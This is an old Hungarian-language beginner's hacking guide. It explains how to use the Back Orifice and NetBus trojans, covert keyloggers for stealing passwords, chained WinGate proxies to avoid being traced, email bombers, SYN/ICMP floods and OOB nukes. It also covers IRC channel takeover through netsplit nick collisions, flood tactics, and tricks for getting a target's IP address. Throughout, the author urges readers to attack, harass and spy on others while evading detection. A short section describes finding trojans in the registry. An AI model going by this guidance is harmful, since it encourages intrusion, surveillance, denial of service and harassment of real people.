mennek ezzel az anyaggal, nem elsosorban nekik, hanem azoknak az embereknek<br />

keszult, akik felhasznaloi szinten mar regota hasznaljak a szamitogepet, de meg<br />

akarnak ismerkedni a fekete oldallal is; valamint azoknak, akik rejtelyes okokbol<br />

folyton elszallnak az IRC-n torteno beszelgetes kozben.(Vagy mindig kinyilik a CDajto<br />

;)<br />

Oke pupakok! Nezzuk milyen eszkozok allnak rendelkezesre a Windowshoz,<br />

melyekkel egy kis nem kivant mukodest lehet eloidezni a halozatban. Ezt az<br />

oprendszert meg mindig sokkal tobben hasznaljak, mint barmely mas operacios<br />

rendszert, ezert megeri kivul-belul jol megismerni, barmennyire is nem tetszik. Az<br />

igazi hacker mindenre kivancsi.<br />

I. Altalanos eszkozok<br />

II. D.o.S.<br />

III. IRC tudomany<br />

IV. Vegszo<br />

I. Általános eszközök<br />

Ide tartoznak: telnet, trojai programok, portscannerek, keyloggerek, firewall, email<br />

bombazok. Nezzuk mire jok ezek:<br />

1. Telnet<br />

A telnet arra hasznalhato, hogy egy masik gephez csatlakozva szoveges<br />

kommunikaciot folytassunk vele. Ehhez Start>Run>telnet parancsot kell kiadnunk. Pl. ha a mail.matav.hu szamitogephez akarsz<br />

csatlakozni, a 25-os porton, akkor ird be: telnet mail.matav.hu 25. Ha nem adsz meg<br />

portot, akkor alapertelmezettnek a 23-as portot veszi, amit ugy is neveznek, hogy<br />

telnet-port. Ha egy kicsit is tudsz angolul, nem okozhat gondot a telnet hasznalata.<br />

Egyik fontos beallitasa a local echo, amellyel azt adhatjuk meg, hogy az ablakba<br />

altalunk begepelt karaktereket megjelenitse-e a program. Ez azert lehet hasznos,<br />

mert van olyan szerver, amelyik a neki kuldott karaktereket visszakuldi, igy ketszer<br />

jelenik meg az ablakban es ez zavaro. Ha viszont kikapcsoljuk es a szerver nem<br />

kuldi vissza (ez az echo) akkor nem latjuk, mit irunk.<br />

77


Hackers’ Guide<br />

Egyebkent ha egy karaktert leutunk, azt a program azonnal el is kuldi. Ez majd<br />

kesobb fontos lehet.<br />

2. Portscannerek<br />

A portscanner arra jo, hogy egy masik szamitogep nyitott portjait megallapithassuk.<br />

Osszesen 65536 kulonbozo (TCP) portja lehet egy szamitogepnek, de ezek kozul<br />

csak nehany van nyitva. Nehany a nevezetes portok kozul: 25-mail port, ha nyitva<br />

van, akkor valoszinuleg mail-szerver uzemel a gepen; 80-www/http port, webszerver;<br />

21-ftp port; 23-telnet; 7-echo; 13-daytime; 139-netbios; stb. A nyitott portokon<br />

keresztul tudunk csak a gephez kapcsolodni.<br />

Sokfele kulonbozo portscannert lattam mar. A szolgaltatasok koze tartoznak:<br />

megadott IP-tartomany keresese, megadott port-tartomany keresese, loggolas, a<br />

megnyithato portokra beallithato uzenet kuldese, uzenet fogadasa, a szerver altal<br />

lecsukott portok "nyitvatartasi idejenek" merese, a portok megnyitasa kozotti ido<br />

beallithatosaga, stb.<br />

3. Trojai programok<br />

A ket legismertebb a BO (vagy Back Orifice, magyarul hatso nyilas) es a Netbus.<br />

Masok is leirtak mar, mik is ezek, de nem hagyhatom ki oket a felsorolasbol. A trojai<br />

programok olyan programok, melyek ket reszbol allnak: a szerver- es a<br />

kliensprogrambol. Ha a szerverprogramot felinstallalod az egyik gepre, akkor a<br />

klienssel vezerelni tudod azt, es kulonbozo dolgokat tudsz vegrehajtani. Eleg oreg<br />

dolgok mar ezek (tobb mint egy evesek), es habar a hacker-filozofiaval nem<br />

ellenkezik a hasznalatuk, egyesek berzenkednek tole, tul egyszeru oket hasznalni.<br />

Hasznalatuk azert kulonbozo problemakat felvet. Pl. a celgepre valahogy fel kell<br />

installalni a szervert, s ha nincs fizikai hozzaferesed, eleg nehez ugy. Pl. az IRC-n<br />

raveheted, hogy vegye at toled es inditsa el. (Ezt nem taglalom, szerintem nagyon<br />

gyerekes dolog. Akit ra tudsz venni, az annyira buta, hogy inkabb meg kellene<br />

vedeni, nem szivatni.) Nezzuk mit tudnak ezek.<br />

BO - a Cult of the Dead Cow (CdC) termeke. Csak Win9x-en mukodik. Legismertebb<br />

valtozata az 1.20. Kodolt UDP csomagokkal kommunikal, ami osszekottetes-mentes<br />

kommunikaciot jelent. Lehetove teszi a kliensnek a celgep regisztracios<br />

adatbazisanak modositasat, amivel eleg sok mindent vegre tud hajtani. Ki tudja<br />

fejteni a gepen tarolt jelszavakat, pl. a kepernyokimeloet vagy az Internet-eleres<br />

jelszavat. Keplopasra is kepes, bar nem annyira ugyesen, mint a Netbus.<br />

Billentyuzet-figyelest is vegre tud hajtani, valamint kilistazza a futo alkalmazasokat,<br />

merevlemez tartalmat, fileok torlese, mozgatasa, megtekintese, beepitett webszerver,<br />

alkalmazasok leallitasa, inditasa, TCP-n keresztul file-ok fogadasa, kuldese,<br />

sysinfo lekerdezes, gep lefagyasztasa, ujrabootolas az alapszolgaltatasok. Ezeken<br />

kivul kulonfele pluginek leteznek hozza, amelyekkel meg erdekesebb dolgokat lehet<br />

csinalni: hozzakapcsolni a szervert egy masik exe-filehoz, mint egy virust; egy masik<br />

plugin e-mailt kuld a megadott cimre, ha a szamitogep fellep az Internetre, leirja a<br />

gep IP-cimet, stb.<br />

Netbus - tud egypar dolgot, amit a BO, nem mindet, de vannak dolgok, amit a BO<br />

nem tud. Termeszetesen mindketto ugy reklamozza magat, mint "remoteadministering<br />

tool", azaz tav-adminisztracios eszkoz, de a BO inkabb a hackerek<br />

kezebe valo, mig a Netbus szorakozasra. Ilyen pl. a CD-ajto nyitogatasa, az eger<br />

vezerlese, egergombok felcserelese, gombok letiltasa... de azert jol hasznalhato<br />

78


Hackers’ Guide<br />

egyeb piszkos dolgokra is. Sok valtozata terjedt el, 1.53, 1.6, es a leggyakoribb az<br />

1.7. Nemreg jott ki a 2.0, de az mar nem rejti el magat, mert kihagytak belole egy par<br />

lehetoseget, hogy ne lehessen vele visszaelni. Persze ehhez is jelent mar meg crack<br />

... :) Egyebkent TCP-kapcsolatot hoz letre, es WinNT alatt is fut.<br />

Kulonben a legtobb viruskereso felismeri mar oket. Kulon felismero programokat is<br />

konnyen lehet talalni a neten, amelyek eltavolitjak oket. De kezileg is felismerhetok:<br />

inditsd el: Start>Run>regedit, majd<br />

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Currentversion>Run,<br />

vagy RunServices. Itt nezd vegig a programokat, ezeket inditja el a Windows<br />

indulaskor. Ha talalsz valami gyanusat, szedd ki es kesz. (Jobb gomb>Delete.)<br />

Kulonben se tul jo ha ismeretlen dolgok tanyaznak itt. Persze itt csak ovatosan<br />

turkalj, ha valami gyanusat talalsz, elobb nezd meg a haverodnal, neki megvan-e!<br />

4. Keylogger<br />

A keylogger magyarul billentyuzetfigyelo. Jegyzi a leutott billentyuket es eltarolja oket<br />

egy fileba. A Netbusban olyan beepitett billentyuzetfigyelo van, amelyik egybol at is<br />

kuldi a kliensnek a leutott billentyuket. A jobbak azonban eltaroljak az Alt, Ctrl, Shift,<br />

Backspace, Del, F1-F12, Esc stb. karaktereket is, kesobb sokkal jobban fel lehet<br />

hasznalni a logfilet. Lattam olyat is, amelyik a programok inditasat es a kilepeseket is<br />

figyelte es rogzitette. Ezek mar tulmennek az egyszeru billentyuzetfigyeles hataran.<br />

Nos, a billentyuzetfigyelok hasznalata akkor erdekes, ha fizikai hozzaferesed van<br />

(lehetoleg rendszeresen) a celgephez, es masokkal kozosen hasznalod. Jelszavakat,<br />

maganeleti titkokat lophatsz vele. Erdemes olyat valasztani, amelyik kussban fut<br />

(nem eszlelheto), mar sok ilyen van.<br />

5. Firewall<br />

Magyarul tuzfal. Egy olyan program, amellyel a halozati forgalmat tudod figyelni es<br />

kontrollalni. Jo vedelmet jelent, ha egy tuzfal moge bujsz, mert nem tudjak<br />

letapogatni a nyitott portjaidat, ha nem akarod; vagy nem tudnak hozzaferni az<br />

esetlegesen a gepeden futo BO-hoz vagy Netbushoz vagy egyeb trojai programhoz.<br />

Ezek a programok akkor erdekesek, ha pl. modemmel csatlakozol az Internethez,<br />

tehat kozotted es az Internet kozott nincs masik szamitogep. (Pl. nem egy<br />

alhalozaton vagy. Az alhalozatok eseteben csak az egyik gep van az Internetre<br />

kotve, a tobbi ehhez csatlakozik, igy ennek kell a tuzfal szerepet ellatni, hogy az<br />

egesz halozatot megvedje.)<br />

6. WinGate szerverek<br />

A WinGate szerverek relative ismeretlenek a magyar mezei hackereknek. Vagy<br />

ugyesen titkoljak, mindenesetre nem nagyon reklamozzak. A WinGate szerver olyan<br />

szerver, melynek segitsegevel IP cimunket elrejthetjuk, lenyomozhatatlanna tehetjuk.<br />

Ugy kell elkepzelni, hogy ha egy masik szamitogephez akarsz csatlakozni, akkor<br />

kozbeiktatsz egy masik szamitogepet (WinGate szerver) amelynek mindossze<br />

kozvetito szerepe van, de firewallkent is mukodik. (Igen, igen! Aki ezek utan nem jon<br />

ra magatol, mire jo a WinGate, az most azonnal hagyja abba az olvasast, az soha<br />

nem lesz hacker!) Szoval egy igazi nagy durranas. Nezzuk, hogyan kell hasznalni:<br />

Tegyuk fel, hogy a WinGate szerver neve ttt.wingate.com, portja 23 (ez altalanos). A<br />

fenti peldanal maradva, a mail.matav.hu 25-os portjara akarunk csatlakozni. Vegyuk<br />

79


Hackers’ Guide<br />

elo ismet a telnetet:<br />

telnet ttt.wingate.com<br />

A kovetkezo sztringet kapjuk:<br />

WinGate><br />

A WinGate szerverek egyebkent visszaechoznak, tehat a local echot ki kell<br />

kapcsolni. Irjuk be:<br />

mail.matav.hu:25<br />

Es WHALAA! csatlakoztunk a mail.matav.hu 25-os portjara, de meg ha loggoljak is<br />

az IP-t, akkor is azt latjak majd, hogy ttt.wingate.com.<br />

Na persze, vannak egyes WinGate szerverek, amelyek szinten rogzitik a csatlakozok<br />

IP cimeit, de amig kapcsolatba lepnek veluk, visszanyomoznak teged, addig eltelik<br />

egy par nap/het, valamint: "fuzz ossze tobb WinGate szervert egymas utan" es mar<br />

nem is eri meg a faradsagot visszanyomozni teged. Pfff! Egyebkent WinGate szerver<br />

listaert nezz korul a neten, mert allandoan valtozik. (Marmint a lista.)<br />

7. E-mail bombazok<br />

Ezekkel a programokkal inkabb bosszanto mint veszedelmes eredmenyt tudsz elerni,<br />

azonban a torvenyek ezt is tiltjak. Arra szolgalnak, hogy nevtelenul rengeteg<br />

mocskolodo levellel elaraszd a celpont levelesladajat, igy teletoltve egyreszt nem tud<br />

ujat fogadni, masreszt eltart egy darabig, mig letolti oket, majd letorli oket. Hatrany,<br />

hogy nem tudod az arcat figyelni, amikor megpillantja, mennyi levele jott.<br />

Mindenesetre elegtetelt vehetsz. Probald ki az Avalanche es Kaboom legujabb<br />

verzioit. Az Avalanche, nekem ugy tunt tobbet tud: gyorsabbnak mondja magat,<br />

valamint van benne egy sereg opcio.: WinGate hasznalat, hibauzenettel torteno<br />

bombazas, beepitett sertegeto (persze angol), es egy sereg tipp, amelyek jol jonnek<br />

ha letoltod.<br />

II. D.o.S.<br />

A D.o.S. nem a BillGatez-fele fenomenalis oprendszer, hanem a Denial of Service<br />

angol szavak roviditese. A DoS olyan tevekenyseg, melynek soran/eredmenyekepp<br />

egy bizonyos szolgaltatas szinvonala csokken vagy a szolgaltatas megszunik.<br />

Megvilagitom. Tegyuk fel, hogy van egy webszerver (valahol a vilagban, mindegy.)<br />

Ezen egy DoS tamadast vegrehajtva jo esetben a szolgaltatas lelassul, nehezen<br />

elerhetove valnak az oldalak, vagy egyaltalan nem valaszol majd a szerver, esetleg<br />

lefagy, vagy ujraindul.<br />

Most haromfele DoS tamadast fogok ismertetni: a SYN floodot, az ICMP floodot es<br />

az OOB Nuke-t.<br />

SYN flood (forditva/feldolgozva a "SYN Floods and SYN Cookies - The cause and<br />

cure" cimu NeonSurge/Rhino9 irasbol): ez a fajta tamadas a TCP-kapcsolat<br />

felepitesenek serulekenysegen alapul. Mielott belemegyunk, elotte elmagyarazom,<br />

hogyan is mukodik a TCP.<br />

1. A kliens (aki kapcsolatot akar teremteni a masik geppel) kerelmet kuld a<br />

celgepnek, megadva a portot, amelyhez csatlakozni akar.<br />

2. A szerver visszakuldi a kerelem nyugtazasat, valamint lefoglalja a memoriajaban a<br />

kapcsolathoz szukseges adatteruletet.<br />

80


Hackers’ Guide<br />

3. A kliens nyugtazza a szerver valaszat es ezzel a kapcsolat letrejott, lehet TCPcsomagokat<br />

kuldozgetni mindket iranyban.<br />

Kicsit bovebben:<br />

1. A kliens egy SYN (synchronize) kerelmet kuld a szervernek, egy ISNnel (initial<br />

sequence number) egyutt. Az ISNbol rakja sorrendbe az operacios rendszer az<br />

erkezo TCP-csomagokat (a csomagok ugyanis nem biztos, hogy sorrendben<br />

erkeznek, el is veszhetnek utkozben, megduplazodhatnak). Az ISN az alcazott<br />

tamadasok eseteben is fontos szerepet jatszik.<br />

2. A szerver megkapja a SYN-t, es valaszol egy SYN-nel, egy ISN-nel es egy<br />

nyugtazassal (ACK).<br />

3. A kliens nyugtazza (ACK) a szerver valaszt.<br />

A SYN flood lenyege, hogy a kliens az elso lepest vegrehajtja, de a harmadikat mar<br />

nem. Ezaltal a szerver soha nem kap nyugtazast a valaszara, tehat varakozni kezd.<br />

Egy bizonyos ido utan torli a kapcsolatot es felszabaditja a memoriat. Azonban, ha<br />

rovid ido alatt eleg sok kerelem erkezik, a port hasznalhatatlanna valik Optimalis<br />

esetben le is fagyhat.<br />

Abban az esetben, ha a szerver is egy egyszeru szamitogep, mondjuk egy mezei<br />

IRC-felhasznalo, a SYN-floodnak nem sok jelentosege van. De pl. ha ftp- vagy<br />

webszerver fut rajta, meg lehet akadalyozni, hogy mas felhasznalok is tudjanak<br />

kapcsolodni hozza. A port mindaddig hasznalhatatlan marad, amig SYN-kerelmek<br />

erkeznek. Meg nem volt alkalmam kiprobalni, de egyszer majd erdemes lenne, hogy<br />

vegre lehet-e hajtani egy ilyen tamadast valamelyik IRC-szerver 6667-es portjan<br />

(persze gondolom eleg sokan kell csinalni, hogy megalljon a rendszer :).<br />

A tamadast lehet konnyeden alcazni is, azaz a szervernek ugy tuntetni fel a dolgot,<br />

mintha a csomagok mindig mas-mas IP cimrol erkeznenek. Igy nem nagyon lehet<br />

megallapitani, hogy ki volt a tettes. Mellesleg jegyzem meg, hogy ezzel az alcazott<br />

tamadassal tonkre lehet tenni egy tuzfalat is, ha a szerver memoriaja nem tul nagy...<br />

ICMP flood (nemely reszei a Chaos Inc. wnuke4.doc-bol valok): az IP-hez (Internet<br />

Protocol) kozeli szinten mukodik. Az ICMP az Internet Control Message Protocol<br />

angol szavak roviditese. Ez egy adminisztracios protokoll, amely szetkapcsolodott<br />

szamitogepeknek (is) szolgaltat jelenteseket. Az ICMP flood (vagy ICMP nuke)<br />

programok hamis jelentest keszitenek, es a naiv TCP/IP implementaciok azt hiszik,<br />

hogy a kapcsolatuk a celgeppel megszakadt. Ezeknek az ICMP csomagoknak<br />

kulonbozo fajtajuk van, mindegyik mas-mas szetkapcsolodast jelent. Ilyenek pl. a<br />

Protocol Unreachable, Port Unreachable, Network Unreachable, Host Unreachable,<br />

Source Route Failed stb. Az ICMP ECHO flood specialis abbol a szempontbol, hogy<br />

nem okoz szetkapcsolast, hanem valaszt var a celgeptol. Ha nagyon sok ilyen<br />

csomag erkezik, az lelassitja az Internet-kapcsolatot, mert egyreszt fogadja a valaszt,<br />

masreszt erre valaszol is. Ehhez hasonlit meg az UDP flood is, amely azonban a<br />

gyakorlatban mar nem hasznalhato.<br />

Ilyen programokat barki kereshet a neten. Nemcsak Windows szerverekre<br />

mukodnek, es hasznosnak bizonyulhatnak az IRC-haboruban. Egyebkent... ki tudja?<br />

A rombolast szolgalja mind.<br />

81


Hackers’ Guide<br />

OOB Nuke: a Windows-gepekre hatnak, es altalaban a 139-es, NETBIOS porton<br />

operalnak. Specialis csomagokat kuldenek erre a cimre, es ha a tamadas sikeres,<br />

elougrik a Halal Kek Kepernyoje :) ilyenkor az aldozatnak ujra kell inditania a<br />

szamitogepet, ha tovabb akar Internetezni. Nagyon elterjedtek, mert a Win95 és<br />

egyes Win95 OSR2 valtozatok nem voltak kepesek kivedeni. Amennyire en tudom, a<br />

Win98 mar nem reagal rajuk.<br />

III. IRC tudomány<br />

Az IRC eloremozditoja a magyar hackerek fejlodesenek. Szerintem az IRC azert jo<br />

terulet, mert: a) egybol latod munkad vegeredmenyet b) sokan tudnak teamben<br />

dolgozni c) csak az szamit, kinek van tobb esze, nem pedig a nyers testi ero.<br />

Mostanra, ha atolvastad az elso ket fejezetet, tisztaban vagy egy-ket dologgal. Ennek<br />

a fejezetnek az a celja, mikeppen vedd magad a virtualis kuzdoteren. Mert hogy<br />

vedeni kell magad, az nem is vitas. Termeszetesen a leghatekonyabb vedekezes a<br />

tamadas, ezert ezt sem hagyhatod ki a repertoarodbol. Azonban<br />

figyelmezteteskeppen: lehet, hogy az elejen, uj tudasod birtokaban feleslegesen is<br />

hasznalni fogod ezeket az eszkozoket, ami meg megbocsathato, foleg ha figyelembe<br />

vesszuk, hogy neha egy toled erosebb ellenfellel akadsz ossze aki majd helyretesz<br />

(pl. egy IRC operatorral). Ha nem IRCeltel meg, akkor ezt a fejezetet nyugodtan<br />

atugorhatod, mert nem fogod erteni a gyakorlati jelentoseget. Es meg egy jotanacs:<br />

tanulmanyozd at az RFC1459-et, amely minden IRC-hacker elso lepese kellene,<br />

hogy legyen (ebbol lehet leginkabb megerteni sok egyebbel egyutt, hogy miert is jott<br />

letre az IRC).<br />

1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line<br />

2. Flood<br />

3. Wingate><br />

1. Az IRC halozat szerkezete, netsplit, nick collision, K-Line<br />

Az IRC szerverek fa-strukturaban csatlakoznak egymashoz. Ez azt jelenti, hogy zart<br />

lanc sehol nem johet letre. Ha megis letrejonne valahol, akkor ott azonnal szet is<br />

kapcsol ket szerver. (Ez reszletesen le van irva az RFC1459-ben.) Minden kliens<br />

csatlakozik egy szerverhez, es ha uzenetet kuldenek, az vegigvandorol az egesz fan<br />

a szervereken, amig mindenki meg nem kapja, akinek az uzenet szolt. Minden<br />

szerver egyidoben ugyanazt kell, hogy lassa egy IRC-halozaton. Ha valtozas<br />

tortenik, az a szervereken vegighullamozva mindenutt ervenyesitesre jut (pl. ha egy<br />

kliens bejelentkezik valahova, azt az osszes szervernek tudnia kell); ezert nem lehet<br />

zart lanc sehol, hiszen akkor egy szerver ketszer is megkapna egy-egy uzenetet. Ha<br />

tul nagy az adatforgalom ket szerver kozott, akkor a szerverek elvalnak (ez tortenhet<br />

mas okbol is, de ez a legegyszerubb). Ez a netsplit. Ilyenkor az IRC halozat<br />

ketteosztodik, ket fastrukturaju halozat jon letre. Ilyenkor az osszes csatorna is<br />

kettevalik: azok a kliensek, akik a fa elso reszenek valamelyik szervererol jottek be,<br />

csak azokkal a kliensekkel fognak tudni kommunikalni, amelyek szinten azon a<br />

reszen jottek be, mig a masik fa kliensei csak a sajat halozatuk klienseivel. Ilyenkor<br />

minden csatornan az oppal rendelkezok kozul is csak azok fognak megmaradni, akik<br />

a sajat halozaton vannak. Jelenleg a netsplit utan a szerverek 20 percig taroljak a<br />

nick adatokat, azaz 20 percig nem lehet olyan nickre valtani, amelyik a netsplit elott<br />

hasznalatban volt es a masik oldalon maradt. De 20 perc utan mar valaszthatsz<br />

82


Hackers’ Guide<br />

olyan nicket is, amelyik a masik oldalon ragadt, es ennek jelentosege akkor<br />

jelentkezik, mikor a szerverek ujbol osszekapcsolodnak. Ilyenkor a szerverek<br />

kicserelik az informacioikat es egyesitik az azonos nevu csatornakat: aki barmelyik<br />

oldalon op volt, az ezutan is op lesz, aki nem, az nem. Ha a ket oldalon azonos nevu<br />

klienseket talalnak, akkor mind a ketto kapcsolatat megszuntetik a szerverek. (Ez a<br />

nick collision.)<br />

Kezded kapisgalni? Tetelezzuk fel a kovetkezo viszonylag egyszeru esetet: egy<br />

csatornan ket op van, mondjuk mindketto bot. Legyen az egyik @Peti, a masik<br />

@Pali. Tetelezzuk fel, hogy mindketto az irc.elte.hu -rol jott be. Rajtuk kivul meg<br />

Gergely van a csatin, es el akarja foglalni, mert o a hacker. O az irc.webbernet.net -<br />

rol van. Keletkezik egy netsplit, Gergelynek opja lesz a masik oldalon, mivel ott<br />

egyedul van. Meg ket klienset behoz a masik oldalon, arra a halozatra, amelyiken o<br />

is van, Peti es Pali neven. Persze ehhez 20 percet kell varnia, es szerencse kell<br />

ahhoz, hogy ezalatt ne egyesuljon a ket oldal. Miutan mindez megvan, nem kell mast<br />

tennie, mint varni az egyesulesre es ahh! Az osszes Peti es Pali kihal, csak o marad<br />

a csatornan, mint op.<br />

A netsplitek es netjoinok figyelesere lepj be a &servers csatornara, vagy pl. a<br />

Dalneten a +s flaget allitsd be. (Az IRCNeten nem ismerik a flaget.)<br />

A K-Line (szerverban) pedig azt jelenti, hogy egy adott szerverrol nem engednek be<br />

bizonyos IP-cimekrol klienseket. Ezt IRC operatorok tudjak elrendelni (akik, mint<br />

tudjuk, nem ugyanazok, mint a csatornaoperatorok). A szerver nem rendeltetesszeru<br />

hasznalata eseten kaphatunk ilyet, pl. klonok bevitele, folyamatos veg nelkuli<br />

floodolas, csatornak hivatasszeru elfoglalasa, fake username hasznalata, botok<br />

futtatasa, ha tilos stb. Ilyenkor az IRCop donti el, hogy pl a *.dial.matav.hu-et<br />

bannolja, vagy a *.matav.hu-t, vagy esetleg a *.hu-t :)<br />

2. Flood<br />

Nos, ez egyertelmuen tamadofegyver, barmilyen tipusrol is legyen szo. Egy par<br />

lehetoseget mar megvizsgaltunk a II.fejezetben. Az IRC-n leggyakoribb az ICMP<br />

flood, a programokban a szerver helyere azt az IRC szervert ird be, amelyikrol az<br />

ellenfeled bejott, a kliens helyere az o IP-cimet, szerverportok: altalaban 6667-6669,<br />

de ez szerverenkent eltero lehet. A kliensportok pedig altalaban: 1024-1400. A<br />

leghatekonyabb Unreach tipusnak a Protocol Unreachable bizonyult. Most nezzuk<br />

milyen mas eszkozok vannak meg masokat floodolni:<br />

Nickflood: gyorsan valtoztatod a nickedet. Ez ellen nem lehet vedekezni, csak ha<br />

kirugnak a csatornarol. Altalaban is ervenyes, hogy ezeket az eszkozoket csak ott<br />

tudod hatekonyan felhasznalni, ahol nem all fenn ennek a veszelye. A nickflood ellen<br />

nem lehet ignore-val vedekezni, mert a nickvaltasrol szolo uzeneteket mindenkeppen<br />

megkapja minden kliens a szervertol, amelyik a csatornan van.<br />

Topicflood: gyorsan valtoztatod a topicot. Szinten nem lehet vedekezni ellene. Csak<br />

akkor mukodik, ha jogod van a topicot valtoztatni.<br />

Join/Part: gyorsan kilepsz-belepsz a csatornarol/ra. Ezeket az uzeneteket is<br />

megkapja mindenki a csatornan. Ezeken a modokon minden csatornan levo<br />

szemelyt floodolsz.<br />

CTCP flood: nehany IRC kliens implementalja (alkalmazza) a CTCP-t (Client To<br />

Client Protocol). Hasznalata: /ctcp . A tipus lehet: CLIENTINFO,<br />

VERSION, TIME, DCC, USERINFO, FINGER, PING. Hatasara a tipustol fuggoen<br />

83


Hackers’ Guide<br />

mindig egy bizonyos informaciot kapunk a klienstol, pl. milyen verzioju<br />

kliensprogramot hasznal, mennyi nala az ido, valamint a PING- re megkapjuk a<br />

kliens es a kozottunk levo idot, amelyet az uzeneteknek meg kell tenniuk. Ha valakit<br />

CTCP flooddal tamadsz meg, a kliense ugyanolyan gyorsan uzeneteket kuld neked<br />

vissza, de ha szerencsed van, az IRC szerver kiteszi a szuret. Persze a kliensben ki<br />

is lehet kapcsolni a CTCP-t.<br />

Msgflood: privat uzenetek gyors kuldese. Akkor a leghatekonyabb, ha az illetonek<br />

olyan szkriptje van, amely automatikusan valaszol az uzenetekre. Vagy esetleg bot<br />

ellen, ha rosszul van konfiguralva, es nem korlatozza a sajat uzeneteinek<br />

gyorsasagat.<br />

Channelflood: ez a leggagyibb. Egyszeruen rengeteg szemettel arasztod el a<br />

csatornat, igy elvezhetetlen lesz a beszelgetes, optimalis esetben a lassubb<br />

kapcsolattal rendelkezok kiesnek. No persze:<br />

A leghatekonyabb, ha tobben csinaljatok a floodolast, minel tobben, annal jobb.<br />

Irhatsz szkriptet is ra, de jobb megoldasnak tunik, ha programot hasznalsz ra,<br />

amelyik sok klonnal tud egyszerre floodolni. Igy ha ki is esik egyik-masik klon, ujra<br />

tud csatlakozni.<br />

Megjegyzes: Nuke/ICMP flooder programot nem adok el, nem cserelek es nem<br />

vasarolok. Ajandekba se adok.<br />

3. WinGate><br />

Mar tudjuk, mi az a WinGate, nezzuk, hogyan lehet IRC-zesre hasznalni. Legyen a<br />

WinGate a ttt.wingate.com, 23-as port, az irc szerver pedig mondjuk az<br />

irc.wingated.com, 6667-es port.<br />

Inditsuk el az IRC klienst, es irjuk be a statusba:<br />

/server ttt.wingate.com:23<br />

most egy WinGate> promptot kapunk, majd egy csomo szemetet, mert a kliens<br />

automatikusan elkuldi a NICK es USER uzeneteket (ugye elolvastad az RFC1459et?)<br />

mIRC-ben:<br />

/raw irc.wingate.com:6667<br />

kapjuk, hogy connected, mire beirjuk:<br />

/raw NICK Wizard<br />

/raw USER Magic Fairie hacker@wingate.com :Hacker<br />

PIRCH-ben:<br />

/quote irc.wingate.com:6667<br />

megintcsak connected, ha minden jol megy, es akkor beirjuk:<br />

/quote NICK Wizard<br />

/quote USER Magic Fairie hacker@wingate.com :Hacker<br />

Es ha beenged a szerver, akkor kezdhetsz IRC-elni, es barki lekerdezi az IP-det, azt<br />

fogja latni, hogy a ttt.wingate.com-rol jottel be ;) Es valoban onnan is jottel, nem<br />

igaz? Van egy kis bokkeno. Nem tudok magyar WinGate szervert, es a magyar<br />

szerverek nem fogadnak el amerikai csatlakozast. Ez az egyik. Masik: sok szerveren<br />

K-Linera teszik a WinGate szervereket. Gondolj bele: egy IP-rol max. harom<br />

csatlakozast fogadnak el, igy megduplazhatod ezt, vagy akar meg is sokszorozhatod.<br />

Hogy nez ma az ki hogy valaki 15 peldanyban van fent? (Jol nez ki, de az IRCopok<br />

szerint nem :) Az elso problema a nagyobb, mert a magyar szervereken meg nem<br />

lattam WinGate-t K-Linen csak kulonfele sulinetes(!) szervereket.<br />

84


IV. Végszó<br />

Hackers’ Guide<br />

Eredetileg ide valami utbaindito konnyes szoveget akartunk irni, de aztan rajottunk,<br />

hogy egy igazi hacker ugyis rajon, mit kell tennie, hogy ne kapjak el, a tobbi meg<br />

inkabb bukjon le! :) Ugyhogy inkabb csak az elerhetosegunket irjuk ide:<br />

IRCNet, qocok es Voyager2 nick, mindig mashol, de altalaban az #eurohack<br />

csatornán. A csatorna pontos nevét lásd ahttp://hackers.freeshell.orgoldalon.<br />

E-mail:qocok@geocities.comésvoyager2@freemail.hu<br />

Vegezetul: nehogy azt gondold, hogy ez minden! Ez az alap! Es nehol annyira<br />

kozerthetoen fogalmaztunk, hogy az mar a szakszeruseg rovasara ment!<br />

************************************************************************************************<br />

Az IP szerzés módszerei<br />

Essünk túl az IP fogalmán. IP (Internet Protocol) : 1 hálózati rétegprotokoll, amely a<br />

gazdaszámítógépek között továbbítja az adatokat. Ez azonban nem teljesen pontos,<br />

mert a felhasználók többsége azt hiszi, de még az Internettel foglalkozó irodalom<br />

jelentős része is az IP-címeket a gazda számítógépekkel hozzák kapcsolatba. Tudni<br />

kell azonban, hogy az Interneten lévő számítógép valójában nem rendelkezik IP<br />

címmel. az IP-cím a számítógépben lévő Ethernet interfészkártya is lehet, ezek<br />

mind1ike saját 1edi IP címmel rendelkezik. Az 1*-űség kedvéért általában az IPcímet<br />

a gazdagéphez kapcsoljuk, de ne felejtsük el, hogy, ténylegesen az<br />

interfészkártyáé (nem mindig gazda számítógépé) az IP-cím.<br />

Remélem érthető volt...<br />

Az IP szerzés módszerei (kezdőknek) :<br />

1. A balfasz : kérdezzük + tőle mi az ip-je. Ezt, pl. úgy tudjuk elérni, hogy felhívjuk rá<br />

az érdeklődését pl: tudtad, hogy minden gép kap belépéskor 1 IP-számot és te<br />

neked is van bla,bla,bla.(sokszor bejön)<br />

2.E-mail Írjunk neki 1 e-mailt mindenféle kamu szöveggel, a lényeg hogy jöjjön<br />

valami válasz rá. Ha megkaptuk a levelet, mentsük le. Így kapunk 1 eml kiterjesztésű<br />

filet. Ezután már csak meg kell néznünk 1 bármilyen 1*-ű wieverrel és máris +kapjuk<br />

1 csomó adatot, de nekünk most csak ez a pár a fontos pl:<br />

balfasz.matav.hu (d27-bp.matav.hu [145.236.158.78]) Így +van az IP is és sok<br />

esetben az is, hogy hol lakik az illető.<br />

Persze mint tudjátok elterjedtek az ingyenes e-mailszolgáltatók. Nincs gond.<br />

Legtöbbször a páciens valamilyen levelező prg-n át használja a szolgáltatást pl:<br />

outlook. Így ugyanazon a mail serveren jön át, tehát ugyanazokat az adatokat kapjuk<br />

+. A gond akkor van, ha az illető a Web felületről küldi a levelet, akkor ugyanis csak<br />

85


Hackers’ Guide<br />

ezt kapjuk meg a módszerral pl: (ns0.matav.hu [145.456.452.25]) ez lófasz sajnos<br />

semmit nem ér, ekkor obi van kenobi. Tehát ha te se akarod +szívni akkor mindig<br />

Webes felületről levelezz.<br />

3. Chat : A csetek nagyon jó támadópontok. Itt az ember nick (bece) neve mellé van<br />

írva az ip-je vagy a hostja. Sajnos már 1-re több cseten levették ezt. De pl: a Talk<br />

Café-n és még jó pár cseten azért van. Ahol nincs kiírva, ott sincs gond.<br />

Jöhet a javaban irt kis programok. (álltalába minden csethez másik kell)<br />

Térjünk vissza a hostra. Hostból IP. Nagyon 1*-ű alap módszer de mindig müxik a<br />

következő: hozzávalók: nyiss 1 dos ablakot, írd be, hogy tracert host pl: tracert d1bp.matav.hu<br />

és kész is.<br />

